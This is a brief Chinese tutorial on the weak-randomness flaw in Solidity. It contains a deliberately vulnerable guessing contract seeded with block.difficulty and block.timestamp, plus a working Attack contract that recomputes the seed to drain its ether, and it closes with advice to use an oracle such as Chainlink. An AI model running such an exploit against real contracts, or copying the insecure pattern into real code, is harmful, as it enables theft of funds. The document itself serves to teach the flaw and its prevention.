一、漏洞
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;
contract GuessTheRandomNumber {
constructor() payable {}
function guess(uint _guess) public {
uint answer = uint(
keccak256(abi.encodePacked(block.difficulty, block.timestamp))
);
if (_guess == answer) {
(bool sent, ) = msg.sender.call{value: 1 ether}("");
require(sent, "Failed to send Ether");
}
}
}
contract Attack {
receive() external payable {}
function attack(GuessTheRandomNumber guessTheRandomNumber) public {
uint answer = uint(
keccak256(abi.encodePacked(block.difficulty, block.timestamp))
);
guessTheRandomNumber.guess(answer);
}
// Helper function to check balance
function getBalance() public view returns (uint) {
return address(this).balance;
}
}
这个猜数的合约很简单,即你猜对了数就给你1 ether,这个随机数生成种子采用的是block.difficulty, block.timestamp。
攻击合约知道随机生成的规则,用了相同的随机数种子——因为都是链上公有的数据,先算出来再调用猜数合约,这样就很容易把合约里的以太都赢过来。
二、预防手段
不用使用block.difficulty、block.timestamp等公用的区块参数作为随机数的种子,这样会很容易被破解。
一般来说,如果你需要用随机数,而且这个随机数要用在非常重要的涉及核心逻辑的场景时,就可以选择从预言机中拿到随机数值,比如chainlink,就提供了随机数。官方文档中有《Get a Random Number》一节,可以点击查看。
